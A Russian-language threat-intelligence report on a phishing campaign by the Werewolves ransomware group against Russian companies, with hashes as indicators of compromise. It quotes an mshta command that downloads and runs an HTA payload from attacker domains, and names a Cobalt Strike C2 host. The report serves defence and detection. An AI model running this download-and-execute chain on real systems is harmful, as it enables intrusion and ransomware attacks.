Специалисты F.A.C.C.T. Threat Intelligence обнаружили новую волну вредоносных рассылок от группы вымогателей Werewolves. Целью новой атаки стали российские промышленные предприятия, телекоммуникационные и IT-компании, финансовые и страховые организации
Группировка Werewolves специализируется на вымогательстве денег с помощью версии программы-вымогателя LockBit3 (Black), собранной на основе появившегося в публичном пространстве билдера. У жертв требуют $130 00 — $1 000 000 за расшифровку и приватность данных. В апреле этого года вымогатели проводили массовые рассылки на тему весеннего призыва и также досудебных претензий. Обычно «оборотни» используют технику двойного давления на жертву: кроме вымогательства за расшифровку данных, злоумышленники выкладывают на сайте информацию о тех, кто отказался платить выкуп.
Перед новой атакой злоумышленники зарегистрировали домен kzst45[.]ru, на котором расположили фейковый сайт одного из российских заводов спецтехники. Они скопировали с помощью программы HTTrack Website Copier содержимое оригинального сайта kzst45[.]com. Отличие — только в доменном имени (у оригинального — .com, у фейкового, появившегося в конце апреля, — .ru):
Сами письма с темами «Досудебная претензия» и «Рекламация» содержали вредоносные вложения, загружающие Cobalt Strike Beacon.
Жертва открывает вложенный документ «Рекламация.doc» (SHA256: da9e7da207a17076785dbe28d6c7922e81d07e84529f80e7a38265c5316fc8d2), который загружает RTF-документ, эксплуатирующий уязвимость CVE-2017-11882.
На устройство жертвы загружается HTA (HTML Application):
mshta https://iplis[.]ru/laydowngrenade.jpeg -> hxxp://vlasta-s[.]ru/logista.hta.
HTA-файл выполняет powershell-команду, в результате которой распаковывается и запускается шелл-код Cobalt Strike Stager.
Stager загружает Сobalt Strike Beacon, конфигурация которого содержит watermark: 987654321 и C&C: poopy[.]aarkhipov[.]ru
Клиенты F.A.C.C.T. Threat Intelligence оперативно получили оповещение о данной массовой атаке и индикаторы компрометации.
Индикаторы компрометацииФайловые индикаторы
рекламация.doc
MD5 adf61ffa03806b954450c8954fb976c7
SHA1 e5d279c7d3e343008b21b0e3d6a840a0c34ae3d3
SHA256 da9e7da207a17076785dbe28d6c7922e81d07e84529f80e7a38265c5316fc8d2
logista.rtf
MD5 cdfb407a0b894f5b4a6108273b81d864
SHA1 ebdf4a64db69c83b5af87ddf47b23a7af3d63914
SHA256 e7c0850f41a5f486dc26c4b62f45f6187ce4145653145fa60ec34abd57bbec98
logista.hta
MD5 976649b232d3525dd239f7139a65dd92
SHA1 5ff57412ef015fde4222520482b186ce12df407c
SHA256 ef893465333cd3d99753d3c2cec442e24b8d3814906bf9ce0df77ea68e243995
Подписывайтесь на остросюжетный Telegram-канал компании F.A.C.C.T., чтобы быть в курсе новостей из мира кибербеза.
